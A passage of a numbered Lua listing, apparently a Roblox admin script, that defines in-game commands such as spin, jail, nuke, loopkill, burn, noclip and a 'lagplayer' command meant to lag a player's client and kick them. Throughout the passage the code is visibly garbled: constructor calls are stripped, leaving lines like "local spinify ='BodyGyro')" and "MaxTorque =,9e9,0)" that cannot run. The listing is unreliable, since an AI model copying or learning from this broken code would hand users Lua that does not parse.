  1153. local rainbowify = rainbowify:Clone() rainbowify.Name = v.Name..':Rainbowify' rainbowify.Parent = v.Character table.insert(createdscripts, rainbowify) wait() rainbowify.Disabled = false
  1154. end
  1155. end
  1156. end
  1157. end, 1, '!rainbow;plr')
  1159. addcommand('spin', 'Spins a player\'s character', true, true, function(speaker, message)
  1160. local plrz = getplayer(speaker, message)
  1161. for i, v in next, plrz do
  1162. spawn(function()
  1163. for x, z in next, createdscripts do if z.Name == v.Name..':Spin' then z.Disabled = true z:Destroy() end end
  1164. if v.Character and v.Character:FindFirstChild('HumanoidRootPart') then
  1165. local spinify ='BodyGyro') spinify.Name = v.Name..':Spin' spinify.MaxTorque =,9e9,0) spinify.P = 5e4 spinify.CFrame = v.Character.HumanoidRootPart.CFrame table.insert(objs, spinify) spinify.Parent = v.Character.HumanoidRootPart
  1166. repeat wait(1/20) spinify.CFrame = spinify.CFrame * CFrame.Angles(0,math.rad(30),0) until not spinify or spinify.Parent ~= v.Character.HumanoidRootPart
  1167. end
  1168. end)
  1169. end
  1170. end, 1, '!spin;plr')
  1172. addcommand({'gold', 'goldify'}, 'Turns a player into pure gold', true, true, function(speaker, message)
  1173. local plrz = getplayer(speaker, message)
  1174. for i, v in next, plrz do
  1175. if v.Character and v.Character:FindFirstChild('HumanoidRootPart') then
  1176. for x, z in next, v.Character:GetChildren() do
  1177. if z:IsA('BasePart') then
  1178. z.BrickColor ='Bright yellow')
  1179. z.Reflectance = .55
  1180. elseif z:IsA('Shirt') or z:IsA('Pants') or z:IsA('ShirtGraphic') then
  1181. z.Parent = v.Character:FindFirstChild('HumanoidRootPart')
  1182. end
  1183. end
  1184. end
  1185. end
  1186. end, 1, '!gold;plr')
  1188. addcommand({'ungold', 'ungoldify', 'normal'}, 'Turns a player back to normal', true, true, function(speaker, message)
  1189. local plrz = getplayer(speaker, message)
  1190. for i, v in next, plrz do
  1191. if v.Character then
  1192. local originalpos = v.Character:GetModelCFrame().p v:LoadCharacter()
  1193. repeat wait() until v.Character and v.Character:FindFirstChild('Humanoid')
  1194. for l = 1, 10 do v.Character:MoveTo(originalpos) wait() end
  1195. end
  1196. end
  1197. end, 1, '!ungold;plr')
  1199. addcommand('unspin', 'Unspins a player\'s character', true, true, function(speaker, message)
  1200. local plrz = getplayer(speaker, message)
  1201. for i, v in next, plrz do
  1202. for x, z in next, objs do if z.Name == v.Name..':Spin' then z:Destroy() end end
  1203. end
  1204. end, 1, '!unspin;plr')
  1206. addcommand('loopheal', 'Constantly regenerates health', false, true, function(speaker, message)
  1207. local plrz = getplayer(speaker, message)
  1208. for i, v in next, plrz do
  1209. if v.Character then
  1210. for x, z in next, createdscripts do if z.Name == v.Name..':Loopheal' then z.Disabled = true z:Destroy() end end
  1211. local loopheal = scriptsfolder:FindFirstChild('LHeal')
  1212. if loopheal then
  1213. local loopheal = loopheal:Clone() loopheal.Name = v.Name..':Loopheal' loopheal.Parent = v.Character table.insert(createdscripts, loopheal) wait() loopheal.Disabled = false
  1214. end
  1215. end
  1216. end
  1217. end, 1, '!loopheal;plr')
  1219. addcommand('unloopheal', 'Stops constantly regenerating health', false, true, function(speaker, message)
  1220. local plrz = getplayer(speaker, message)
  1221. for i, v in next, plrz do
  1222. for x, z in next, createdscripts do if z.Name == v.Name..':Loopheal' then z.Disabled = true z:Destroy() end end
  1223. end
  1224. end, 1, '!unloopheal;plr')
  1226. addcommand({'cmds', 'commands', 'cmdslist', 'commandslist'}, 'Shows a player the list of commands', false, false, function(speaker)
  1227. local alltehcmds = {}; local power = chkadmin(speaker.UserId, false)
  1228. for i, v in next, commands do if v['Commands'] and v['Pow'] and power >= v.Pow then table.insert(alltehcmds, {v.Usage, v.Desc}) end end
  1229. local scr, ls, txt, box, lt = scrollgui(); local num = 0 scr.Name = 'COMMANDS' box:ClearAllChildren() lt.Text = addskip('COMMANDS')
  1230. for i, v in next, alltehcmds do
  1231. local ntxt = txt:Clone() ntxt.Text = tostring(num+1)..'. '..v[1] ntxt.Position =,0,0,20*num) ntxt.Parent = box num = num + 1
  1232. local dsc ='StringValue') dsc.Name = 'Information' dsc.Value = v[2] dsc.Parent = ntxt
  1233. end scr.Parent = speaker:WaitForChild('PlayerGui') txt:Destroy() wait(1/20) ls.Disabled = false
  1234. end, 0, '!commands')
  1236. addcommand('jail', 'Jails a player', false, true, function(speaker, message)
  1237. local plrz = getplayer(speaker, message)
  1238. for i, v in next, plrz do
  1239. spawn(function()
  1240. if v.Character and v.Character:FindFirstChild('HumanoidRootPart') then
  1241. local pos =,1,0); local vname = v.Name
  1242. local jail ='Model') jail.Name = vname..':Jail' table.insert(jailscreated, jail)
  1243. local top = jailpart(pos,,4,0),,.5,5),jail)
  1244. local bottom = jailpart(pos,,-3,0),,.5,5),jail)
  1245. local right = jailpart(pos,,.5,0),,6.5,5),jail)
  1246. local left = jailpart(pos,,.5,0),,6.5,5),jail)
  1247. local forward = jailpart(pos,,.5,2.25),,6.5,.5),jail)
  1248. local back = jailpart(pos,,.5,-2.25),,6.5,.5),jail)
  1249. jail.Parent = WorkspaceService
  1250. local con con = v.CharacterAdded:Connect(function()
  1251. if not jail or (jail.Parent ~= WorkspaceService) then con:Disconnect() return end
  1252. repeat wait() until v.Character and v.Character:FindFirstChild('Humanoid') and v.Character:FindFirstChild('HumanoidRootPart')
  1253. v.Character.HumanoidRootPart.CFrame = pos
  1254. end)
  1255. local con2 con2 = PlayersService.PlayerAdded:Connect(function(p)
  1256. if not jail or (jail.Parent ~= WorkspaceService or (p.Name ~= vname)) then con2:Disconnect() return end
  1257. local con = p.CharacterAdded:Connect(function()
  1258. if not jail or (jail.Parent ~= WorkspaceService) then con:Disconnect() return end
  1259. repeat wait() until p.Character and p.Character:FindFirstChild('Humanoid') and p.Character:FindFirstChild('HumanoidRootPart')
  1260. p.Character.HumanoidRootPart.CFrame = pos
  1261. end)
  1262. end)
  1263. end
  1264. end)
  1265. end
  1266. end, 2, '!jail;plr')
  1268. addcommand('unjail', 'Unjails a player', false, true, function(speaker, message)
  1269. local plrz = getplayer(speaker, message)
  1270. for i, v in next, plrz do
  1271. for x, z in next, jailscreated do
  1272. if z.Name == v.Name..':Jail' then
  1273. z:Destroy()
  1274. end
  1275. end
  1276. end
  1277. end, 2, '!unjail;plr')
  1279. addcommand('nuke', 'Nukes a specific area', true, false, function(speaker, message)
  1280. if not speaker.Character then return end
  1281. local orig = speaker.Character:GetModelCFrame()
  1282. local nukez ='Part') nukez.Shape = 'Ball' nukez.Size =, 6, 6) nukez.Transparency = .75 nukez.TopSurface = 10 nukez.BottomSurface = 10 nukez.BrickColor ='Bright yellow') nukez.Anchored = true nukez.CanCollide = false nukez.Name = 'Nuke'
  1283. local nukez2 = nukez:Clone()
  1284. local nukez3 = nukez:Clone()
  1285. nukez.Touched:Connect(function(hit)
  1286. if not hit.Parent then return end
  1287. local newnuke = nukez:Clone()
  1288. game:GetService('Debris'):AddItem(newnuke, 1)
  1289. newnuke.Size = nukez.Size -, 6, 6)
  1290. local exp ='Explosion')
  1291. pcall(function() exp.Position = hit.CFrame.p end)
  1292. exp.Parent = WorkspaceService
  1293. local hum = hit.Parent:FindFirstChildOfClass('Humanoid')
  1294. if hum then hum.Health = 0 end
  1295. newnuke.Parent = WorkspaceService
  1296. end)
  1297. nukez.Parent = WorkspaceService nukez2.Parent = WorkspaceService nukez3.Parent = WorkspaceService
  1298. for i = 6, 333 do
  1299. nukez.Size =, i, i) nukez.CFrame = orig
  1300. nukez2.Size = nukez.Size -*125, (i/333)*125, (i/333)*125) nukez2.CFrame = orig
  1301. nukez3.Size = nukez.Size -*200, (i/333)*200, (i/333)*200) nukez3.CFrame = orig
  1302. wait()
  1303. end
  1304. for i = .75, 1, .05 do nukez.Transparency = i nukez2.Transparency = i nukez3.Transparency = i wait(1/37)
  1305. end
  1306. nukez:Destroy() nukez2:Destroy() nukez3:Destroy()
  1307. end, 4, '!nuke;plr')
  1309. addcommand({'invis', 'invisible', 'inv'}, 'Turns a player invisible', false, true, function(speaker, message)
  1310. local plrz = getplayer(speaker, message)
  1311. for i, v in next, plrz do
  1312. spawn(function()
  1313. if v.Character and v.Character:FindFirstChild('HumanoidRootPart') then
  1314. for c = 0, 1, .1 do
  1315. for x, z in next, v.Character:GetChildren() do
  1316. if z:IsA('BasePart') and not z.Name:match('dRoot') then
  1317. z.Transparency = c
  1318. if z:FindFirstChild('face') then
  1319. z.face.Transparency = c
  1320. end
  1321. elseif z:IsA('Accessory') and z:FindFirstChild('Handle') then
  1322. z.Handle.Transparency = c
  1323. end
  1324. end
  1325. wait(1/20)
  1326. end
  1327. end
  1328. end)
  1329. end
  1330. end, 1, '!invisible;plr')
  1332. addcommand({'vis', 'visible'}, 'Reverses the invisible effect for a player', false, true, function(speaker, message)
  1333. local plrz = getplayer(speaker, message)
  1334. for i, v in next, plrz do
  1335. spawn(function()
  1336. if v.Character and v.Character:FindFirstChild('HumanoidRootPart') then
  1337. for c = 1, 0, -.1 do
  1338. for x, z in next, v.Character:GetChildren() do
  1339. if z:IsA('BasePart') and not z.Name:match('dRoot') then
  1340. z.Transparency = c
  1341. if z:FindFirstChild('face') then
  1342. z.face.Transparency = c
  1343. end
  1344. elseif z:IsA('Accessory') and z:FindFirstChild('Handle') then
  1345. z.Handle.Transparency = c
  1346. end
  1347. end
  1348. wait(1/20)
  1349. end
  1350. end
  1351. end)
  1352. end
  1353. end, 1, '!visible;plr')
  1355. addcommand('trip', 'Trips a player', false, true, function(speaker, message)
  1356. local plrz = getplayer(speaker, message)
  1357. for i, v in next, plrz do
  1358. if v.Character then
  1359. local hrp = v.Character:FindFirstChild('HumanoidRootPart')
  1360. local hum = v.Character:FindFirstChildOfClass('Humanoid')
  1361. if hum then spawn(function() hum.PlatformStand = true wait(1) hum.PlatformStand = false end) end
  1362. if hrp then hrp.CFrame = hrp.CFrame * CFrame.Angles(math.rad(-45), 0, 0) end
  1363. end
  1364. end
  1365. end, 1, '!trip;plr')
  1367. addcommand('shadowsneaker', 'Turns a player into a killer shadow', true, true, function(speaker, message)
  1368. local plrz = getplayer(speaker, message)
  1369. for i, v in next, plrz do
  1370. spawn(function()
  1371. if v.Character then
  1372. for x, z in next, clonescreated do if z.Name == v.Name..':Clone' then z:Destroy() end end
  1373. for x, z in next, createdscripts do if z.Name == v.Name..':Clone' then z:Destroy() end end
  1374. local bf ='BodyForce') bf.Parent = v.Character.HumanoidRootPart
  1375. for x, z in next, v.Character:GetChildren() do
  1376. if z:IsA('BasePart') then z.Transparency = .5 z.BrickColor ='Really black')
  1377. spawn(function() wait(1) z.Transparency = 1 end)
  1378. if z:FindFirstChild('face') then z.face:Destroy() end
  1379. z.Touched:Connect(function(hit) if hit.Parent and hit.Parent.Name ~= v.Name then local hum = hit.Parent:FindFirstChild('Humanoid') if hum then hum.Health = 0 end end end)
  1380. bf.force = bf.force +,z:GetMass()*162.9,0)
  1381. if z.Name:match('dRoot') then z.Transparency = 1 end
  1382. elseif z:IsA('Pants') or z:IsA('Shirt') or z:IsA('ShirtGraphic') or z:IsA('Accessory') or z:IsA('Model') then z:Destroy()
  1383. elseif z:IsA('Humanoid') then z.WalkSpeed = 50
  1384. end
  1385. end
  1386. v.Character.Archivable = true
  1387. local PlrClone = v.Character:Clone()
  1388. if PlrClone:FindFirstChild('Humanoid') then PlrClone.Humanoid:Destroy() end
  1389. v.Character.Archivable = false
  1390. PlrClone.Name = v.Name..':Clone'
  1391. local clonez = scriptsfolder:FindFirstChild('Sn')
  1392. if clonez then
  1393. local clonez = clonez:Clone() clonez.Name = v.Name..':Clone'
  1394. --if clonez:FindFirstChild('PLR') then clonez.PLR.Value = v.Name else local val ='StringValue') val.Name = 'PLR' val.Value = v.Name val.Parent = clonez end
  1395.  table.insert(createdscripts, clonez) table.insert(clonescreated, PlrClone)  PlrClone.Parent = v.Character clonez.Parent = v.Character wait() clonez.Disabled = false
  1396. end
  1397. end
  1398. end)
  1399. end
  1400. end, 1, '!shadowsneaker;plr')
  1402. addcommand('unshadowsneaker', 'Reverses the affects of Shadow Sneaker', false, true, function(speaker, message)
  1403. local plrz = getplayer(speaker, message)
  1404. for i, v in next, plrz do
  1405. spawn(function()
  1406. for x, z in next, clonescreated do if z.Name == v.Name..':Clone' then z:Destroy() end end
  1407. for x, z in next, createdscripts do if z.Name == v.Name..':Clone' then z:Destroy() end end
  1408. local origpos = v.Character:GetModelCFrame()
  1409. v:LoadCharacter()
  1410. repeat wait(1/8) until v.Character and v.Character:FindFirstChild('Humanoid') and v.Character.Humanoid.Health ~= 0
  1411. v.Character:MoveTo(origpos.p)
  1412. end)
  1413. end
  1414. end, 1, '!unshadowsneaker;plr')
  1416. addcommand({'laggame', 'lg'}, 'Lags the game', true, false, function(speaker) local lagify = scriptsfolder:FindFirstChild('Lag') if lagify then local lagify = lagify:Clone() lagify.Name = 'LAGIFY' table.insert(createdscripts, lagify) lagify.Parent = WorkspaceService wait() lagify.Disabled = false end end, 2, '!laggame')
  1418. addcommand({'unlaggame', 'unlg'}, 'Unlags the game', true, false, function(speaker)
  1419. for i, v in next, createdscripts do if v.Name == 'LAGIFY' then v.Disabled = true v:Destroy() end end
  1420. for i, v in next, WorkspaceService:GetChildren() do if v.Name:lower():match('lag') then v:Destroy() end end
  1421. end, 2, '!unlaggame')
  1423. addcommand({'tadmin', 'tempadmin', 'ta'}, 'Gives a player the lowest admin rank', false, true, function(speaker, message)
  1424. local plrz = getplayer(speaker, message)
  1425. for i, v in next, plrz do
  1426. if chkadmin(v.UserId, false) < 1 then
  1427. table.insert(tempadmins, v.Name)
  1428. createmessage({v}, 'You\'re an admin!', true, 'TheeDeathCaster', false)
  1429. end
  1430. end
  1431. end, 2, '!tempadmin;plr')
  1433. addcommand({'untempadmin', 'unta', 'untadmin'}, 'Takes away a player\'s temp admin abilities', false, true, function(speaker, message)
  1434. for x = 1, #tempadmins do
  1435. if tempadmins[x]:sub(1, #message):lower() == message:lower() then
  1436. table.remove(tempadmins, x)
  1437. end
  1438. end
  1439. end, 2, '!untempadmin;plr')
  1441. addcommand('lagplayer', 'Lags a player to death [Can not be undone]', true, true, function(speaker, message)
  1442. local plrz = getplayer(speaker, message)
  1443. for i, v in next, plrz do
  1444. spawn(function()
  1445. if v:FindFirstChild('PlayerGui') then
  1446. local laggify = scriptsfolder:FindFirstChild('Laggy')
  1447. if laggify then
  1448. local laggify = laggify:Clone()
  1449. laggify.Name = tostring(random:NextNumber()) -- I'm mean ;)
  1450. laggify.Parent = v.PlayerGui
  1451. end
  1452. v.CharacterAdded:Wait() v:Kick() -- o my, iz tiz 2 m00ch? C;
  1453. end
  1454. end)
  1455. end
  1456. end, 3, '!lagplayer;plr')
  1458. addcommand('noclip', 'Noclips a player', true, true, function(speaker, message)
  1459. local plrz = getplayer(speaker, message)
  1460. for i, v in next, plrz do
  1461. for x, z in next, createdscripts do if z.Name == v.Name..':Noclip' and z:FindFirstChild('NOCLIP') then z.NOCLIP:Destroy() end end
  1462. if v:FindFirstChild('PlayerGui') then
  1463. local noclip = scriptsfolder:FindFirstChild('Noclip')
  1464. if noclip then
  1465. local noclip = noclip:Clone() noclip.Name = v.Name..':Noclip' table.insert(createdscripts, noclip) noclip.Parent = v.PlayerGui wait() noclip.Disabled = false
  1466. end
  1467. end
  1468. end
  1469. end, 1, '!noclip;plr')
  1471. addcommand({'unnoclip', 'clip'}, 'Clips a player', false, true, function(speaker, message)
  1472. local plrz = getplayer(speaker, message)
  1473. for i, v in next, plrz do
  1474. for x, z in next, createdscripts do if z.Name == v.Name..':Noclip' and z:FindFirstChild('NOCLIP') then z.NOCLIP:Destroy() end end
  1475. end
  1476. end, 1, '!clip;plr')
  1478. addcommand('burn', 'Burns a player to death', true, true, function(speaker, message)
  1479. local plrz = getplayer(speaker, message)
  1480. for i, v in next, plrz do
  1481. if v.Character then
  1482. local burn = scriptsfolder:FindFirstChild('Burn')
  1483. if burn then
  1484. local burn = burn:Clone() burn.Name = v.Name..':Burn' burn.Parent = v.Character table.insert(createdscripts, burn) wait() burn.Disabled = false
  1485. end
  1486. end
  1487. end
  1488. end, 1, '!burn;plr')
  1490. addcommand('unburn', 'Stops a burning player', true, true, function(speaker, message)
  1491. local plrz = getplayer(speaker, message)
  1492. for i, v in next, plrz do
  1493. if v.Character then
  1494. local num = 0
  1495. for e, r in next, createdscripts do
  1496. if r.Name == v.Name..':Burn' then
  1497. for x, z in next, v.Character:GetChildren() do
  1498. if z:IsA('BasePart') and z.BrickColor =='Black') then num = num + 1 end
  1499. end
  1500. if num < 6 then r.Disabled = true r:Destroy() for x, z in next, v.Character:GetChildren() do spawn(function()  local f = z:FindFirstChildOfClass('Fire') if f then f.Enabled = false wait(1) f:Destroy() end end) end end
  1501. end
  1502. end -- It's too late to save the player :c
  1503. end
  1504. end
  1505. end, 1, '!unburn;plr')
  1507. addcommand('bighead', 'Turns a player\'s head big to the point where it\'ll explode', true, true, function(speaker, message)
  1508. local plrz = getplayer(speaker, message)
  1509. for i, v in next, plrz do
  1510. spawn(function()
  1511. if v.Character and v.Character:FindFirstChild('Head') then
  1512. local mesh = v.Character.Head:FindFirstChildOfClass('SpecialMesh')
  1513. if mesh then
  1514. for x = 1, 10, .1 do local s = (x/10)*5 mesh.Scale =,s,s) wait() end
  1515. local exp ='Explosion')
  1516. exp.Position = v.Character:GetModelCFrame().p
  1517. wait()
  1518. exp.Parent = WorkspaceService
  1519. pcall(function() for z = 1, 10 do v.Character.Humanoid.Health = 0 wait() end end)
  1520. end
  1521. end
  1522. end)
  1523. end
  1524. end, 2, '!bighead;plr')
  1526. addcommand('ice', 'Turns a player into ice', true, true, function(speaker, message)
  1527. local plrz = getplayer(speaker, message)
  1528. for i, v in next, plrz do
  1529. if v.Character then
  1530. local hrp = v.Character:FindFirstChild('HumanoidRootPart')
  1531. for x, z in next, v.Character:GetChildren() do
  1532. if z:IsA('BasePart') and z ~= hrp then z.Reflectance = .75 z.Transparency = .001
  1533. elseif z:IsA('Shirt') or z:IsA('Pants') or z:IsA('ShirtGraphic') then if hrp then z.Parent = hrp end
  1534. end
  1535. end
  1536. end
  1537. end
  1538. end, 1, '!ice;plr')
  1540. addcommand('melt', 'Unices a player', true, true, function(speaker, message)
  1541. local plrz = getplayer(speaker, message)
  1542. for i, v in next, plrz do
  1543. if v.Character then
  1544. local hrp = v.Character:FindFirstChild('HumanoidRootPart')
  1545. if hrp then
  1546. local shirt, pants = hrp:FindFirstChildOfClass('Shirt'), hrp:FindFirstChildOfClass('Pants')
  1547. if shirt then shirt.Parent = v.Character end
  1548. if pants then pants.Parent = v.Character end
  1549. end
  1550. for x, z in next, v.Character:GetChildren() do
  1551. if z:IsA('BasePart') and not z.Name:match('dRoot') then z.Reflectance = 0 z.Transparency = 0
  1552. elseif z:IsA('Shirt') or z:IsA('Pants') then if hrp then z.Parent = hrp end
  1553. end
  1554. end
  1555. end
  1556. end
  1557. end, 1, '!melt;plr')
  1559. addcommand('seizure', 'Puts a player into a seizure', true, true, function(speaker, message)
  1560. local plrz = getplayer(speaker, message)
  1561. for i, v in next, plrz do
  1562. spawn(function()
  1563. if v.Character and v.Character:FindFirstChild('HumanoidRootPart') and v.Character:FindFirstChild('Humanoid') then
  1564. local seizure ='BodyVelocity') seizure.Name = v.Name..':Seizure' seizure.MaxForce =,9e9,9e9) seizure.P = 5e4 seizure.Velocity =,-1,0) table.insert(objs, seizure) seizure.Parent = v.Character.HumanoidRootPart
  1565. local seizure2 ='BodyGyro') seizure2.Name = v.Name..':Seizure' seizure2.MaxTorque =,9e9,9e9) seizure2.P = 5e4 seizure2.CFrame = v.Character.HumanoidRootPart.CFrame*CFrame.Angles(math.rad(-90),0,0) table.insert(objs, seizure2) seizure2.Parent = v.Character.HumanoidRootPart
  1566. repeat wait(1/20) v.Character.Humanoid.PlatformStand = true seizure.Velocity =,10),-1,random:NextInteger(-10,10)) until not seizure or seizure.Parent ~= v.Character.HumanoidRootPart
  1567. end
  1568. end)
  1569. end
  1570. end, 2, '!seizure;plr')
  1572. addcommand('unseizure', 'Stops a player\'s seizure', false, true, function(speaker, message)
  1573. local plrz = getplayer(speaker, message)
  1574. for i, v in next, plrz do
  1575. spawn(function()
  1576. for x, z in next, objs do if z.Name == v.Name..':Seizure' then z:Destroy() end end
  1577. if v.Character then local hum = v.Character:FindFirstChild('Humanoid') if hum then for x = 1, 20 do hum.PlatformStand = false wait() end end end
  1578. end)
  1579. end
  1580. end, 2, '!unseizure;plr')
  1582. addcommand('pathwalk', 'Creates a walk path for a player', true, true, function(speaker, message)
  1583. local plrz = getplayer(speaker, message)
  1584. for i, v in next, plrz do
  1585. if v.Character then
  1586. local path = scriptsfolder:FindFirstChild('Path')
  1587. if path then
  1588. local path = path:Clone() path.Name = v.Name..':Path' path.Parent = v.Character table.insert(createdscripts, path) wait() path.Disabled = false
  1589. end
  1590. end
  1591. end
  1592. end, 2, '!pathwalk;plr')
  1594. addcommand('unpathwalk', 'Stops giving a player a walk path', false, true, function(speaker, message)
  1595. local plrz = getplayer(speaker, message)
  1596. for i, v in next, plrz do
  1597. for x, z in next, createdscripts do if z.Name == v.Name..':Path' then z.Disabled = true z:Destroy() end end
  1598. end
  1599. end, 2, '!unpathwalk;plr')
  1601. addcommand('teleto', 'Teleports you to another player', false, true, function(speaker, message)
  1602. local plrz = getplayer(speaker, message) local player = nil
  1603. if #plrz > 0 then player = plrz[1] end
  1604. if player and player.Character and speaker.Character then
  1605. local hrp = speaker.Character:FindFirstChild('HumanoidRootPart')
  1606. local hrp2 = player.Character:FindFirstChild('HumanoidRootPart')
  1607. if hrp and hrp2 then hrp.CFrame = hrp2.CFrame else speaker.Character:MoveTo(player.Character:GetModelCFrame().p) end
  1608. end
  1609. end, 1, '!teleto;plr')
  1611. addcommand({'teleport', 'tp'}, 'Teleports players to another player', false, true, function(speaker, message)
  1612. pcall(function()
  1613. local chk = message:find(split) local plrz1 = getplayer(speaker, message:sub(1, chk-1)) local plrz2 = getplayer(speaker, message:sub(chk+1))
  1614. for i, v in next, plrz1 do
  1615. for x, z in next, plrz2 do
  1616. if v.Character and z.Character then
  1617. local hrp = v.Character:FindFirstChild('HumanoidRootPart')
  1618. local hrp2 = z.Character:FindFirstChild('HumanoidRootPart')
  1619. if hrp and hrp2 then hrp.CFrame = hrp2.CFrame else v.Character:MoveTo(z.Character:GetModelCFrame().p) end
  1620. end
  1621. end
  1622. end
  1623. end)
  1624. end, 1, '!teleport;plr;thee')
  1626. addcommand('strobe', 'Strobes the game', true, false, function(speaker)
  1627. for i, v in next, createdscripts do if v.Name == ':Strobe' or v.Name == ':Rainbow' then v.Disabled = true v:Destroy() end end
  1628. local strobe = scriptsfolder:FindFirstChild('Strobe')
  1629. if strobe then
  1630. local strobe = strobe:Clone() strobe.Name = ':Strobe' strobe.Parent = WorkspaceService table.insert(createdscripts, strobe) wait() strobe.Disabled = false
  1631. end
  1632. end, 2, '!strobe')
  1634. addcommand('disco', 'Discos the game', true, false, function(speaker)
  1635. for i, v in next, createdscripts do if v.Name == ':Strobe' or v.Name == ':Rainbow' then v.Disabled = true v:Destroy() end end
  1636. local disco = scriptsfolder:FindFirstChild('Disco')
  1637. if disco then
  1638. local disco = disco:Clone() disco.Name = ':Rainbow' disco.Parent = WorkspaceService table.insert(createdscripts, disco) wait() disco.Disabled = false
  1639. end
  1640. end, 1, '!disco')
  1642. addcommand({'fixlighting', 'fixl', 'undisco', 'unstrobe'}, 'Restores the lighting service\'s properties', false, false, function(speaker)
  1643. for i, v in next, createdscripts do if v.Name == ':Strobe' or v.Name == ':Rainbow' then v.Disabled = true v:Destroy() end end
  1644. LightingService.Ambient = LightingSettings.ambient LightingService.Brightness = LightingSettings.brightness LightingService.GlobalShadows = LightingSettings.globalshadows LightingService.OutdoorAmbient = LightingSettings.outdoorambient LightingService.TimeOfDay = LightingSettings.timeofday LightingService.FogColor = LightingSettings.fogcolour LightingService.FogEnd = LightingSettings.fogend LightingService.FogStart = LightingSettings.fogstart
  1645. end, 1, '!fixlighting')
  1647. addcommand('loopkill', 'Loopkills a player', true, true, function(speaker, message)
  1648. pcall(function()
  1649. local num = 9e9 local chk = message:find(split) local plrz = getplayer(speaker, message)
  1650. if chk and tonumber(message:sub(chk+1)) then plrz = getplayer(speaker, message:sub(1, chk-1)) num = tonumber(message:sub(chk+1)) end
  1651. for i, v in next, plrz do
  1652. spawn(function()
  1653. if not chkloopkill(v.Name) then
  1654. local plrname = v.Name
  1655. table.insert(plrstoloopkill, v.Name)
  1656. for x = 1, num do
  1657. if not chkloopkill(v.Name) then break end
  1658. repeat plr = PlayersService:FindFirstChild(plrname) wait(1/8) until plr and plr.Character and plr.Character:FindFirstChild('Humanoid') and plr.Character.Humanoid.Health ~= 0
  1659. plr.Character:BreakJoints()
  1660. plr.Character.Humanoid.Health = 0
  1661. end
  1662. end
  1663. end)
  1664. end
  1665. end)
  1666. end, 2, '!loopkill;plr[;num]') -- Tried to make this work without the need of a second script, and IT WORX!!! :D
  1668. addcommand('unloopkill', 'Stops loopkilling a player', false, true, function(speaker, message)
  1669. local plrz = getplayer(speaker, message)
  1670. for i, v in next, plrz do for x = 1, #plrstoloopkill do if plrstoloopkill[x] == v.Name then table.remove(plrstoloopkill, x) end end end
  1671. for i = 1, #plrstoloopkill do if plrstoloopkill[i]:lower():match(message:lower()) then table.remove(plrstoloopkill, i) end end
  1672. end, 1, '!unloopkill;plr') -- ^ Overkill? OR AN AWESOME IDEA??? :D
  1674. addcommand('settings', 'Shows a list of the script\'s settings', false, false, function(speaker)
  1675. remote2:InvokeClient(speaker, prefix, split, slock)
  1676. remote2.OnServerInvoke = function(player, p, s, z) prefix = p split = s slock = z end
  1677. end, 5, '!settings')
  1679. addcommand('test', 'Sends a message if the admin\'s functioning', false, false, function(speaker)
  1680. createmessage({speaker}, 'Admin works!', false, 'TheeDeathCaster', 10)
  1681. end, 1, '!test')
  1683. addcommand('shield', 'Protects a player in a shield', false, true, function(speaker, message)
  1684. local plrz = getplayer(speaker, message)
  1685. for i, v in next, plrz do
  1686. for x, z in next, createdscripts do if z.Name == v.Name..':Shield' then z.Disabled = true z:Destroy() end end
  1687. if v.Character then
  1688. local shield = scriptsfolder:FindFirstChild('Shield')
  1689. if shield then
  1690. local shield = shield:Clone() shield.Name = v.Name..':Shield' shield.Parent = v.Character table.insert(createdscripts, shield) wait() shield.Disabled = false
  1691. end
  1692. end
  1693. end
  1694. end, 1, '!shield;plr')
  1696. addcommand('unshield', 'Takes away a player\'s shield', false, true, function(speaker, message)
  1697. local plrz = getplayer(speaker, message)
  1698. for i, v in next, plrz do
  1699. for x, z in next, createdscripts do if z.Name == v.Name..':Shield' then z.Disabled = true z:Destroy() end end
  1700. if v.Character then
  1701. for x, z in next, v.Character:GetChildren() do
  1702. if z:IsA('ForceField') or z.Name == 'SHIELD' then z:Destroy() end
  1703. end
  1704. end
  1705. end
  1706. end, 1, '!unshield;plr')
  1708. addcommand('flip', 'Flips a player', true, true, function(speaker, message)
  1709. local plrz = getplayer(speaker, message)
  1710. for i, v in next, plrz do
  1711. spawn(function()
  1712. if v.Character and v.Character:FindFirstChild('Humanoid') and v.Character:FindFirstChild('HumanoidRootPart') then
  1713. v.Character.Humanoid.PlatformStand = true
  1714. v.Character.HumanoidRootPart.Anchored = true
  1715. local cfra = v.Character.HumanoidRootPart.CFrame
  1716. local cfra2 = cfra*CFrame.Angles(math.rad(-180),0,0)
  1717. for i = 360, 0, -5 do
  1718. v.Character.HumanoidRootPart.CFrame = cfra:lerp(cfra2, i/180)
  1719. wait()
  1720. end
  1721. v.Character.HumanoidRootPart.Anchored = false
  1722. v.Character.Humanoid.PlatformStand = false
  1723. end
  1724. end)
  1725. end
  1726. end, 1, '!flip;plr')
  1728. addcommand('backflip', 'Backflips a player', true, true, function(speaker, message)
  1729. local plrz = getplayer(speaker, message)
  1730. for i, v in next, plrz do
  1731. spawn(function()
  1732. if v.Character and v.Character:FindFirstChild('Humanoid') and v.Character:FindFirstChild('HumanoidRootPart') then
  1733. v.Character.Humanoid.PlatformStand = true
  1734. v.Character.HumanoidRootPart.Anchored = true
  1735. local cfra = v.Character.HumanoidRootPart.CFrame
  1736. local cfra2 = cfra*CFrame.Angles(math.rad(-180),0,0)
  1737. for i = 0, 360, 5 do
  1738. v.Character.HumanoidRootPart.CFrame = cfra:lerp(cfra2, i/180)
  1739. wait()
  1740. end
  1741. v.Character.HumanoidRootPart.Anchored = false
  1742. v.Character.Humanoid.PlatformStand = false
  1743. end
  1744. end)
  1745. end
  1746. end, 1, '!backflip;plr')
  1748. addcommand('fire', 'Sets a player on fire, but doesn\'t kill the player', true, true, function(speaker, message)
  1749. local plrz = getplayer(speaker, message)
  1750. for i, v in next, plrz do
  1751. if v.Character then
  1752. for x, z in next, v.Character:GetChildren() do
  1753. if z:IsA('BasePart') then local fire ='Fire') fire.Parent = z end
  1754. end
  1755. end
  1756. end
  1757. end, 1, '!fire;plr')
  1759. addcommand({'unfire', 'unsparkly'}, 'Puts out the burning, yet not killed, or makes the player unsparkly', false, true, function(speaker, message)
  1760. local plrz = getplayer(speaker, message)
  1761. for i, v in next, plrz do
  1762. if v.Character then
  1763. for x, z in next, v.Character:GetChildren() do
  1764. if z:IsA('BasePart') then
  1765. for e, q in next, z:GetChildren() do
  1766. spawn(function() if q:IsA('Fire') or q:IsA('Sparkles') then q.Enabled = false wait(3) q:Destroy() end end)
  1767. end
  1768. end
  1769. end
  1770. end
  1771. end
  1772. end, 1, '!unfire;plr, !unsparkly;plr')
  1774. addcommand('sparkly', 'Makes a player all sparkly! [Literally]', true, true, function(speaker, message)
  1775. local plrz = getplayer(speaker, message)
